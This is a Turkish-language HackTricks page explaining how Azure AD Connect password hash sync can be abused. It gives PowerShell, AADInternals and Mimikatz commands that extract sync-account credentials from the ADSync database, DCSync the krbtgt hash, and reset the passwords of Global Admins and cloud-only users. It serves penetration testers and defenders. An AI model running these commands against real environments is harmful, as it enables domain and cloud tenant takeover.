Az - PHS - Password Hash Sync

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da bizi takip edin 🐦 @hacktricks_live.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

Temel Bilgiler

Belgelerden: Parola hash senkronizasyonu, hibrit kimlik elde etmek için kullanılan oturum açma yöntemlerinden biridir. Azure AD Connect, bir kullanıcının parolasının hash'inin, on-premises Active Directory örneğinden bulut tabanlı Azure AD örneğine senkronize edilmesini sağlar.

Bu, şirketler tarafından on-prem AD'yi Azure AD ile senkronize etmek için kullanılan en yaygın yöntemdir.

Tüm kullanıcılar ve parola hash'lerinin hash'i on-prem'den Azure AD'ye senkronize edilir. Ancak, düz metin parolalar veya orijinal hash'ler Azure AD'ye gönderilmez. Ayrıca, Yerleşik güvenlik grupları (alan yöneticileri gibi...) Azure AD'ye senkronize edilmez.

Hash senkronizasyonu her 2 dakikada bir gerçekleşir. Ancak, varsayılan olarak, parola süresi dolma ve hesap süresi dolma Azure AD'de senkronize edilmez. Bu nedenle, on-prem parolasının süresi dolmuş (değiştirilmemiş) bir kullanıcı, eski parolayı kullanarak Azure kaynaklarına erişmeye devam edebilir.

Bir on-prem kullanıcısı bir Azure kaynağına erişmek istediğinde, kimlik doğrulama Azure AD'de gerçekleşir.

PHS, Kimlik Koruma ve AAD Alan Hizmetleri gibi özellikler için gereklidir.

Pivotlama

PHS yapılandırıldığında bazı ayrılmış hesaplar otomatik olarak oluşturulur:

MSOL_<installationID> hesabı, on-prem AD'de otomatik olarak oluşturulur. Bu hesaba Dizin Senkronizasyon Hesapları rolü verilir (bkz. belgeler), bu da onun on-prem AD'de replikasyon (DCSync) izinlerine sahip olduğu anlamına gelir.
Azure AD'de Sync_<on-prem ADConnect Sunucusunun adı>_installationID adlı bir hesap oluşturulur. Bu hesap, Azure AD'deki HERHANGİ bir kullanıcının (senkronize edilmiş veya yalnızca bulut) parolasını sıfırlayabilir.

Önceki iki ayrıcalıklı hesabın parolaları, Azure AD Connect'in kurulu olduğu sunucudaki bir SQL sunucusunda saklanır. Yöneticiler, bu ayrıcalıklı kullanıcıların parolalarını düz metin olarak çıkarabilir. Veritabanası C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf konumundadır.

Bir tablodan yapılandırmayı çıkarmak mümkündür, biri şifreli olmak üzere:

SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent;

Şifreli yapılandırma, DPAPI ile şifrelenmiştir ve on-prem AD'deki MSOL_* kullanıcısının parolalarını ve AzureAD'deki Sync_* parolasını içerir. Bu nedenle, bunları ele geçirerek AD ve AzureAD'ye yükseltilmiş erişim sağlamak mümkündür.

Bu kimlik bilgilerin nasıl saklandığı ve çözüldüğüne dair tam bir genel bakış bu konuşmada bulunmaktadır.

Azure AD connect sunucusunu bulma

Eğer Azure AD connect'in kurulu olduğu sunucu alan katılımcısıysa (belgelerde önerilir), onu bulmak mümkündür:

# ActiveDirectory module
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAccountName,Description | fl

#Azure AD module
Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}

MSOL_* İstismar Etme

# Once the Azure AD connect server is compromised you can extract credentials with the AADInternals module
Get-AADIntSyncCredentials

# Using the creds of MSOL_* account, you can run DCSync against the on-prem AD
runas /netonly /user:defeng.corp\MSOL_123123123123 cmd
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"'

Bu kimlik bilgilerini elde etmek için adconnectdump aracını da kullanabilirsiniz.

Sync_* İstismar Etme

Sync_* hesabını ele geçirerek, herhangi bir kullanıcının (Global Yöneticiler dahil) şifresini sıfırlamak mümkündür.

# This command, run previously, will give us alse the creds of this account
Get-AADIntSyncCredentials

# Get access token for Sync_* account
$passwd = ConvertTo-SecureString '<password>' -AsPlainText - Force
$creds = New-Object System.Management.Automation.PSCredential ("Sync_SKIURT-JAUYEH_123123123123@domain.onmicrosoft.com", $passwd)
Get-AADIntAccessTokenForAADGraph -Credentials $creds - SaveToCache

# Get global admins
Get-AADIntGlobalAdmins

# Get the ImmutableId of an on-prem user in Azure AD (this is the Unique Identifier derived from on-prem GUID)
Get-AADIntUser -UserPrincipalName onpremadmin@domain.onmicrosoft.com | select ImmutableId

# Reset the users password
Set-AADIntUserPassword -SourceAnchor "3Uyg19ej4AHDe0+3Lkc37Y9=" -Password "JustAPass12343.%" -Verbose

# Now it's possible to access Azure AD with the new password and op-prem with the old one (password changes aren't sync)

Aynı zamanda sadece bulut kullanıcılarının şifrelerini değiştirmek de mümkündür (bu beklenmedik olsa bile)

# To reset the password of cloud only user, we need their CloudAnchor that can be calculated from their cloud objectID
# The CloudAnchor is of the format USER_ObjectID.
Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,ObjectID

# Reset password
Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbosewers

Kullanıcının şifresini dökmek de mümkündür.

Başka bir seçenek, Sync kullanıcısının izinlere sahip olduğu bir hizmet ilkesi için ayrıcalıklı izinler atamak ve ardından o hizmet ilkesine erişmek olarak privesc sağlamaktır.

Seamless SSO

PHS ile Seamless SSO kullanmak mümkündür, bu da diğer kötüye kullanımlara açıktır. Bunu kontrol edin:

Az - Seamless SSO

Referanslar

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAz - Federation NextAz - PTA - Pass-through Authentication

Last updated 3 days ago